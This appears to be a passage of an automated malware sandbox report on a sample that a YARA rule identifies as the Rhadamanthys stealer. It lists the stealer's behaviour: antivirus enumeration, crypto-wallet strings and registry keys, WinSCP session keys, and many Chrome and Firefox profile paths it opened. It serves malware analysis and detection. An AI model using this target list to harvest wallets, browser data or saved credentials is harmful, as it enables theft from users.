                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E9494D0 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,3_2_00007FF79E9494D0
                        Source: C:\Users\Public\ajbs50ul.batCode function: 3_2_00007FF79E93E220 GetSystemTimePreciseAsFileTime,3_2_00007FF79E93E220
                        Source: C:\Windows\System32\OpenWith.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 11.3.OpenWith.exe.1bd88071e18.84.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000003.1599427862.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1601684073.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1662054663.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1616514622.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1758061652.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1788512707.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1631714527.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1607930303.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1636622080.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1790719264.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1637295094.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1602503505.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1505528408.000001BD854A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1621950664.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1614824639.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1603758838.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1606697672.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1601304637.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1807031317.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1594385953.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1598054710.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1625351972.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1605446278.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1599122967.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1631177009.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1604550057.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1835330246.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1622398648.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1630915907.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1610447240.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1623646235.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1592648399.000001BD88031000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1595094361.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1611340042.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1603435540.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1596720432.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1612017140.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1593833995.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1623171299.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1614239162.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1594138733.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1614513286.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1625054748.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1665607668.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1610863973.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1604127571.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1656743401.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1615770138.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1597744056.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000003.1489116263.00000000030E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.1533595393.000000001C0C1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1596995655.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1601020298.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1662849713.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1607422599.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1592648399.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1605580653.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1655729634.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1600689319.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1594826093.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1595345338.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1630028343.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1596030593.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1596532747.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1616130125.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1613817370.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1612242561.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000003.1607767904.000001BD8812D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: OpenWith.exe, 0000000B.00000003.1624543124.000001BD875A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Electrum\config
                        Source: OpenWith.exe, 0000000B.00000003.1594021561.000001BD8758D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ty.jaxx
                        Source: OpenWith.exe, 0000000B.00000003.1623646235.000001BD8822A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                        Source: OpenWith.exe, 0000000B.00000003.1623646235.000001BD8822A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %AppData%\Exodus
                        Source: OpenWith.exe, 0000000B.00000003.1636222676.000001BD88055000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sk\AppData\Roaming\Coinomi\Coinomi\wallets
                        Source: powershell.exe, 00000001.00000002.1559772878.00007FFAAC630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
                        Tries to harvest and steal Bitcoin Wallet information
                        Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-QtJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\System32\OpenWith.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\SecurityJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.defaultJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\startupCacheJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-releaseJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67Jump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsing\google4Jump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\mainJump to behavior
                        Source: C:\Windows\System32\OpenWith.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
